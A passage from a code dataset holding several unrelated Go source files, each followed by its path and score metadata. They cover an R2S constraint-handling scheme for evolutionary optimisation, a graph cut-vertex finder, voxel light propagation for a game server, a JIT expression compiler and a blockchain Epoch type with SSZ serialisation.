Z float64
//InitialDeltaIn, InitialDeltaOut float64
DeltaIn, DeltaOut []float64
HasCheckedActiveConstraints bool
ActiveConstraints []bool
Val float64
NUMacd, FESc, FESmax int
}
func NewR2S(FESc, NUMacd int, val, z float64, constraintsCount, generations int) *R2S {
return &R2S{
DeltaIn: make([]float64, generations),
DeltaOut: make([]float64, generations),
ActiveConstraints: make([]bool, constraintsCount),
HasCheckedActiveConstraints: false,
FESmax: generations,
FESc: FESc,
NUMacd: NUMacd,
Val: val,
Z: z,
}
}
func (r2s *R2S) Name() string {
return "R2S"
}
func (r2s *R2S) Threshold(gen int) float64 {
return r2s.DeltaOut[gen]
}
func (r2s *R2S) Initialise(t int, maxviolation float64) {
r2s.DeltaIn[0] = maxviolation
r2s.DeltaIn[t] = maxviolation
r2s.DeltaOut[0] = maxviolation
r2s.DeltaOut[t] = maxviolation
}
// InitializeDeltaIn is used to initialize deltaIn to the input parameter passed to the method
func (r2s *R2S) initializeDeltaIn(initialDeltaIn float64) {
//fmt.Println("DeltaIn[0]: ", initialDeltaIn)
r2s.DeltaIn[0] = initialDeltaIn
}
// InitializeDeltaOut is used to set an initial value for deltaOut
func (r2s *R2S) initializeDeltaOut(feasibleRatio float64, population []types.Individual) {
//If number of feasible solutions is below 20% we calculate using maxviolation of the 20 "best" individuals
//If not it is set to 1.
//TODO: evalute if there are better approaches with better synergy with PPS
if feasibleRatio < 0.2 {
rankedPopulation := biooperators.FastNonDominatedSort(population)
bestIndividuals := make([]types.Individual, len(population)*1/5)
i := 0
for _, nonDominatingSet := range rankedPopulation {
for _, individual := range nonDominatingSet {
bestIndividuals[i] = individual
i++
if i == len(bestIndividuals) {
break
}
}
if i == len(bestIndividuals) {
break
}
}
sumConstraintViolation := 0.0
for _, individual := range bestIndividuals {
//fmt.Println(i, "\tTotal Constraint Violation: ", individual.Fitness().TotalViolation())
sumConstraintViolation += individual.Fitness().TotalViolation()
}
r2s.DeltaOut[0] = sumConstraintViolation / float64(len(bestIndividuals))
} else {
r2s.DeltaOut[0] = 1
}
//fmt.Println("DeltaOut[0]: ", r2s.DeltaOut[0])
}
// Update updates the deltaIn and deltaOut of r2s.
// Require that cfe is a float to allow the use of interface for constraint handling.
func (r2s *R2S) Update(t int, cfe float64) {
if r2s.HasActiveConstraints() {
r2s.updateDeltaIn(t, int(cfe))
r2s.updateDeltaOut(t, int(cfe))
}
}
// UpdateDeltaIn is used to update deltaIn for each generation
func (r2s *R2S) updateDeltaIn(t int, cfe int) {
minDeltaIn := 0.002 * r2s.DeltaIn[0]
p1 := float64(cfe)
numerator := r2s.DeltaIn[0] - minDeltaIn
denominator := float64(r2s.FESmax)
calcDeltaIn := r2s.DeltaIn[0] - p1*(numerator/denominator)
r2s.DeltaIn[t] = math.Max(minDeltaIn, calcDeltaIn)
//fmt.Println("DeltaIn[", t, "]=", r2s.DeltaIn[t])
}
// UpdateDeltaOut is used to calculate a new value for deltaOut each generation
func (r2s *R2S) updateDeltaOut(t int, cfe int) {
if cfe <= r2s.FESc {
p1 := r2s.DeltaOut[0]
numerator := float64(cfe)
denominator := float64(r2s.FESc)
p2 := 1 - (numerator / denominator)
r2s.DeltaOut[t] = p1 * math.Pow(p2, r2s.Z)
} else {
r2s.DeltaOut[t] = 0.0
}
//fmt.Println("DeltaOut[", t, "]=", r2s.DeltaOut[t])
}
//ACD check for active constraints near an assumed optimal individual
func (r2s *R2S) ACD(iter, cfe int, fitness []types.Fitness) {
if r2s.HasCheckedActiveConstraints {
return
}
r2s.HasCheckedActiveConstraints = true
activeConstraints := make([]bool, fitness[0].ConstraintCount)
//fmt.Println("Generation:", iter, "\tUpdating active constraints!")
//fmt.Println("Len fitness list:", len(fitness))
for _, fit := range fitness {
// fmt.Println("Constraint Values: ", fit.ConstraintValues)
for constraint, constraintVal := range fit.ConstraintValues {
if r2s.constraintIsActive(constraintVal) {
activeConstraints[constraint] = true
}
}
}
r2s.ActiveConstraints = activeConstraints
//fmt.Println("Active Constraints: ", r2s.ActiveConstraints)
}
func (r2s *R2S) constraintIsActive(constraintVal float64) bool {
return math.Abs(constraintVal) <= r2s.Val
}
//HasActiveConstraints check if any of the constraints of the problem are seen as active
func (r2s R2S) HasActiveConstraints() bool {
for _, val := range r2s.ActiveConstraints {
if val {
return true
}
}
return false
}
//Violation returns the constraint violation of an individual
func (r2s R2S) Violation(t int, fitness types.Fitness) float64 {
var total float64
if !r2s.HasActiveConstraints() {
return fitness.TotalViolation()
}
for c, isActiveConstraint := range r2s.ActiveConstraints {
if !isActiveConstraint {
continue
}
l := r2s.l(t, fitness.ConstraintTypes[c], fitness.ConstraintValues[c])
r := r2s.r(t, fitness.ConstraintTypes[c], fitness.ConstraintValues[c])
if l >= 0 && l <= r2s.DeltaIn[t] && r >= 0 && r <= r2s.DeltaOut[t] {
//fmt.Println("individual is inside boundary")
continue
}
total += math.Min(math.Abs(l), math.Abs(r))
}
return math.Abs(total)
}
func (r2s R2S) l(t int, constraintType types.ConstraintType, constraintViolation float64) float64 {
if constraintType == types.EqualsOrGreaterThanZero {
return r2s.DeltaIn[t] - math.Max(0.0, constraintViolation)
}
return r2s.DeltaIn[t] - math.Abs(math.Min(0.0, constraintViolation))
}
func (r2s R2S) r(t int, constraintType types.ConstraintType, constraintViolation float64) float64 {
if constraintType == types.EqualsOrGreaterThanZero {
return r2s.DeltaOut[t] - math.Abs(math.Min(0.0, constraintViolation))
}
return r2s.DeltaOut[t] - math.Max(0.0, constraintViolation)
} | chm/r2s.go | 0.607081 | 0.465813 | r2s.go | starcoder |
package graph
import (
"github.com/DmitryBogomolov/algorithms/graph/internal/utils"
)
// In a DFS tree a vertex is articulation point if:
// - it is root and has at least two children
// - it is not root and has subtree with no back edges to ancestors
func findCutVerticesCore(
gr Graph,
// original vertex distances
distances []int,
// updated vertex distances
updatedDistances []int,
articulation []bool,
// distance from DFS root to current vertex
distance int,
parentVertexID int, vertexID int,
) {
children := 0
distances[vertexID] = distance
updatedDistances[vertexID] = distances[vertexID]
for _, adjacentVertexID := range gr.AdjacentVertices(vertexID) {
if distances[adjacentVertexID] == -1 {
children++
findCutVerticesCore(gr, distances, updatedDistances, articulation, distance+1, vertexID, adjacentVertexID)
// If child vertex distance is less than current vertex distance
// then there is back edge from child vertex to ancestors of current vertex.
updatedDistances[vertexID] = utils.Min(updatedDistances[vertexID], updatedDistances[adjacentVertexID])
// If child vertex had back edge then its updated distance would be less
// than current vertex original distance.
if updatedDistances[adjacentVertexID] >= distances[vertexID] && parentVertexID != vertexID {
articulation[vertexID] = true
}
} else if adjacentVertexID != parentVertexID {
// Update current vertex distance - it can be reached faster going through child vertex.
updatedDistances[vertexID] = utils.Min(updatedDistances[vertexID], distances[adjacentVertexID])
}
}
// Current vertex is root and has at least two children.
if parentVertexID == vertexID && children > 1 {
articulation[vertexID] = true
}
}
// FindCutVertices finds cut-vertices in a graph.
// Cut-vertex (articulation vertex) is a vertex whose removal increases number of connected components.
// A graph is biconnected if it has no articulation vertices.
// https://algs4.cs.princeton.edu/41graph/Biconnected.java.html
func FindCutVertices(gr Graph) []int {
distances := make([]int, gr.NumVertices())
updatedDistances := make([]int, gr.NumVertices())
articulation := make([]bool, gr.NumVertices())
utils.ResetList(distances)
utils.ResetList(updatedDistances)
for vertexID := 0; vertexID < gr.NumVertices(); vertexID++ {
if distances[vertexID] == -1 {
findCutVerticesCore(gr, distances, updatedDistances, articulation, 0, vertexID, vertexID)
}
}
var result []int
for vertexID, flag := range articulation {
if flag {
result = append(result, vertexID)
}
}
return result
} | graph/graph/cut_vertices.go | 0.68784 | 0.517815 | cut_vertices.go | starcoder |
package chunk
import (
"container/list"
"github.com/df-mc/dragonfly/server/block/cube"
)
// insertBlockLightNodes iterates over the chunk and looks for blocks that have a light level of at least 1.
// If one is found, a node is added for it to the node queue.
func (a *lightArea) insertBlockLightNodes(queue *list.List) {
a.iterSubChunks(anyLightBlocks, func(pos cube.Pos) {
if level := a.highest(pos, LightBlocks); level > 0 {
queue.PushBack(node(pos, level, BlockLight))
}
})
}
// anyLightBlocks checks if there are any blocks in the SubChunk passed that emit light.
func anyLightBlocks(sub *SubChunk) bool {
for _, layer := range sub.storages {
for _, id := range layer.palette.values {
if LightBlocks[id] != 0 {
return true
}
}
}
return false
}
// insertSkyLightNodes iterates over the chunk and inserts a light node anywhere at the highest block in the
// chunk. In addition, any skylight above those nodes will be set to 15.
func (a *lightArea) insertSkyLightNodes(queue *list.List) {
a.iterHeightmap(func(x, z int, height, highestNeighbour, highestY int) {
// If we hit a block like water or leaves (something that diffuses but does not block light), we
// need a node above this block regardless of the neighbours.
pos := cube.Pos{x, height, z}
if level := a.highest(pos, FilteringBlocks); level != 15 && level != 0 {
queue.PushBack(node(pos.Add(cube.Pos{0, 1}), 15, SkyLight))
pos[1]++
}
for y := pos[1]; y < highestY; y++ {
// We can do a bit of an optimisation here: We don't need to insert nodes if the neighbours are
// lower than the current one, on the same Y level, or one level higher, because light in
// this column can't spread below that anyway.
if pos[1]++; pos[1] < highestNeighbour {
queue.PushBack(node(pos, 15, SkyLight))
continue
}
// Fill the rest with full skylight.
a.setLight(pos, SkyLight, 15)
}
})
}
// insertLightSpreadingNodes inserts light nodes into the node queue passed which, when propagated, will
// spread into the neighbouring chunks.
func (a *lightArea) insertLightSpreadingNodes(queue *list.List, lt light) {
a.iterEdges(a.nodesNeeded(lt), func(pa, pb cube.Pos) {
la, lb := a.light(pa, lt), a.light(pb, lt)
if la == lb || la-1 == lb || lb-1 == la {
// No chance for this to spread. Don't check for the highest filtering blocks on the side.
return
}
if filter := a.highest(pb, FilteringBlocks) + 1; la > filter && la-filter > lb {
queue.PushBack(node(pb, la-filter, lt))
} else if filter = a.highest(pa, FilteringBlocks) + 1; lb > filter && lb-filter > la {
queue.PushBack(node(pa, lb-filter, lt))
}
})
}
// nodesNeeded checks if any light nodes of a specific light type are needed between two neighbouring SubChunks when
// spreading light between them.
func (a *lightArea) nodesNeeded(lt light) func(sa, sb *SubChunk) bool {
if lt == SkyLight {
return func(sa, sb *SubChunk) bool {
return &sa.skyLight[0] != &sb.skyLight[0]
}
}
return func(sa, sb *SubChunk) bool {
// Don't add nodes if both sub chunks are either both fully filled with light or have no light at all.
return &sa.blockLight[0] != &sb.blockLight[0]
}
}
// propagate spreads the next light node in the node queue passed through the lightArea a. propagate adds the neighbours
// of the node to the queue for as long as it is able to spread.
func (a *lightArea) propagate(queue *list.List) {
n := queue.Remove(queue.Front()).(lightNode)
if a.light(n.pos, n.lt) >= n.level {
return
}
a.setLight(n.pos, n.lt, n.level)
for _, neighbour := range a.neighbours(n) {
filter := a.highest(neighbour.pos, FilteringBlocks) + 1
if n.level > filter && a.light(neighbour.pos, n.lt) < n.level-filter {
neighbour.level = n.level - filter
queue.PushBack(neighbour)
}
}
}
// lightNode is a node pushed to the queue which is used to propagate light.
type lightNode struct {
pos cube.Pos
lt light
level uint8
}
// node creates a new lightNode using the position, level and light type passed.
func node(pos cube.Pos, level uint8, lt light) lightNode {
return lightNode{pos: pos, level: level, lt: lt}
} | server/world/chunk/light.go | 0.632049 | 0.500916 | light.go | starcoder |
package jit
import (
"fmt"
)
// unary expression OP X
type Expr1 struct {
X Expr
Op Op1
K Kind
}
// binary expression X OP Y
type Expr2 struct {
X Expr
Y Expr
Op Op2
K Kind
}
func NewExpr1(op Op1, x Expr) *Expr1 {
kind := x.Kind()
if op.IsCast() {
// cast Ops have the same values
// as the corresponding Kind
kind = Kind(op)
}
return &Expr1{x, op, kind}
}
func NewExpr2(op Op2, x Expr, y Expr) *Expr2 {
return &Expr2{x, y, op, x.Kind()}
}
func NewExprIdx(x Expr, y Expr, kind Kind) *Expr2 {
return &Expr2{x, y, IDX, kind}
}
// implement Expr interface
func (e *Expr1) Kind() Kind {
return e.K
}
func (e *Expr1) Const() bool {
return false
}
func (e *Expr1) String() string {
if e.Op.IsCast() {
return fmt.Sprintf("%v(%v)", e.Op, e.X)
}
return fmt.Sprintf("(%v %v)", e.Op, e.X)
}
// implement Expr interface
func (e *Expr2) Kind() Kind {
return e.K
}
func (e *Expr2) Const() bool {
return false
}
func (e *Expr2) String() string {
if e.Op == IDX {
return fmt.Sprintf("%v[%v]", e.X, e.Y)
}
return fmt.Sprintf("(%v %v %v)", e.X, e.Op, e.Y)
}
func IsLeaf(e Expr) bool {
switch e.(type) {
case *Expr1, *Expr2:
return false
default:
return true
}
}
// compile expression
func (c *Comp) Expr(e Expr) (Expr, SoftReg) {
return c.expr(e, nil)
}
func (c *Comp) expr(e Expr, dst Expr) (Expr, SoftReg) {
var dstsoft SoftReg
switch e := e.(type) {
case *Expr1:
return c.expr1(e, dst)
case *Expr2:
return c.expr2(e, dst)
case Const, Reg, Mem, SoftReg:
dst = e
default:
errorf("unknown expression type %T: %v", e, e)
}
return dst, dstsoft
}
// compile unary expression
func (c *Comp) expr1(e *Expr1, dst Expr) (Expr, SoftReg) {
dsoft, _ := dst.(SoftReg)
var tofree SoftReg
var dto Expr
if dsoft.Valid() {
// forward the request to write into dsoft
dto = dst
}
src, ssoft := c.expr(e.X, dto)
if dst == nil {
if ssoft.Valid() {
dsoft = MakeSoftReg(ssoft.Id(), e.K)
} else {
dsoft = c.newTempReg(e.K)
tofree = dsoft
}
dst = dsoft
} else if dst != nil && dst.Kind() != e.K {
// do not trust the kind of provided dst
if dsoft.Valid() {
dsoft = MakeSoftReg(dsoft.Id(), e.K)
} else {
dsoft = c.newTempReg(e.K)
tofree = dsoft
}
dst = dsoft
}
c.code.Op1(e.Op, src, dst)
if ssoft.Id() != dsoft.Id() {
c.freeTempReg(ssoft)
}
if dsoft.Valid() && dsoft != dst {
// copy dsoft to the requested destination
// and free it
c.code.Inst2(ASSIGN, dst, dsoft)
c.freeTempReg(tofree)
dsoft = MakeSoftReg(0, Invalid)
}
return dst, dsoft
}
// compile binary expression
func (c *Comp) expr2(e *Expr2, dst Expr) (Expr, SoftReg) {
// output.Debugf("jit.Comp.expr2: e = %v, dst = %v", e, dst)
// output.Debugf("\twith x.kind = %v, y.kind = %v, e.kind = %v", e.X.Kind(), e.Y.Kind(), e.Kind())
dsoft, _ := dst.(SoftReg)
var tofree SoftReg
var dto Expr
if dsoft.Valid() {
// forward the request to write into dst
dto = dst
}
src1, soft1 := c.expr(e.X, dto)
src2, soft2 := c.Expr(e.Y)
if dst == nil {
if soft1.Valid() {
dsoft = MakeSoftReg(soft1.Id(), e.K)
} else if soft2.Valid() && e.Op.IsCommutative() {
dsoft = MakeSoftReg(soft2.Id(), e.K)
} else {
dsoft = c.newTempReg(e.K)
tofree = dsoft
}
dst = dsoft
} else if dst != nil && dst.Kind() != e.K {
// do not trust the kind of provided dst
if dsoft.Valid() {
dsoft = MakeSoftReg(dsoft.Id(), e.K)
} else {
dsoft = c.newTempReg(e.K)
tofree = dsoft
}
}
c.code.Op2(e.Op, src1, src2, dst)
if soft1.Id() != dsoft.Id() {
c.freeTempReg(soft1)
}
if soft2.Id() != dsoft.Id() {
c.freeTempReg(soft2)
}
if dsoft.Valid() && dsoft != dst {
// copy dsoft to the requested destination
// and free it
c.code.Inst2(ASSIGN, dst, dsoft)
c.freeTempReg(tofree)
dsoft = MakeSoftReg(0, Invalid)
}
return dst, dsoft
} | vendor/github.com/cosmos72/gomacro/jit/expr.go | 0.577972 | 0.420778 | expr.go | starcoder |
package types
import (
"fmt"
fssz "github.com/ferranbt/fastssz"
)
var _ fssz.HashRoot = (Epoch)(0)
var _ fssz.Marshaler = (*Epoch)(nil)
var _ fssz.Unmarshaler = (*Epoch)(nil)
// Epoch represents a single epoch.
type Epoch uint64
// Mul multiplies epoch by x.
func (e Epoch) Mul(x uint64) Epoch {
return Epoch(uint64(e) * x)
}
// Div divides epoch by x.
func (e Epoch) Div(x uint64) Epoch {
if x == 0 {
panic("divbyzero")
}
return Epoch(uint64(e) / x)
}
// Add increases epoch by x.
func (e Epoch) Add(x uint64) Epoch {
return Epoch(uint64(e) + x)
}
// AddSlot increases epoch using slot value.
func (e Epoch) AddSlot(x Slot) Epoch {
return e + Epoch(x)
}
// AddEpoch increases epoch using another epoch value.
func (e Epoch) AddEpoch(x Epoch) Epoch {
return Epoch(uint64(e) + uint64(x))
}
// Sub subtracts x from the epoch.
func (e Epoch) Sub(x uint64) Epoch {
if uint64(e) < x {
panic("underflow")
}
return Epoch(uint64(e) - x)
}
// Mod returns result of `epoch % x`.
func (e Epoch) Mod(x uint64) Epoch {
return Epoch(uint64(e) % x)
}
// Mod returns result of `epoch % slot`.
func (e Epoch) ModSlot(x Slot) Epoch {
return Epoch(uint64(e) % uint64(x))
}
// HashTreeRoot returns calculated hash root.
func (e Epoch) HashTreeRoot() ([32]byte, error) {
return fssz.HashWithDefaultHasher(e)
}
// HashWithDefaultHasher hashes a HashRoot object with a Hasher from the default HasherPool.
func (e Epoch) HashTreeRootWith(hh *fssz.Hasher) error {
hh.PutUint64(uint64(e))
return nil
}
// UnmarshalSSZ deserializes the provided bytes buffer into the epoch object.
func (e *Epoch) UnmarshalSSZ(buf []byte) error {
if len(buf) != e.SizeSSZ() {
return fmt.Errorf("expected buffer of length %d received %d", e.SizeSSZ(), len(buf))
}
*e = Epoch(fssz.UnmarshallUint64(buf))
return nil
}
// MarshalSSZTo marshals epoch with the provided byte slice.
func (e *Epoch) MarshalSSZTo(dst []byte) ([]byte, error) {
marshalled, err := e.MarshalSSZ()
if err != nil {
return nil, err
}
return append(dst, marshalled...), nil
}
// MarshalSSZ marshals epoch into a serialized object.
func (e *Epoch) MarshalSSZ() ([]byte, error) {
marshalled := fssz.MarshalUint64([]byte{}, uint64(*e))
return marshalled, nil
}
// SizeSSZ returns the size of the serialized object.
func (e *Epoch) SizeSSZ() int {
return 8
} | epoch.go | 0.882377 | 0.428831 | epoch.go | starcoder |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.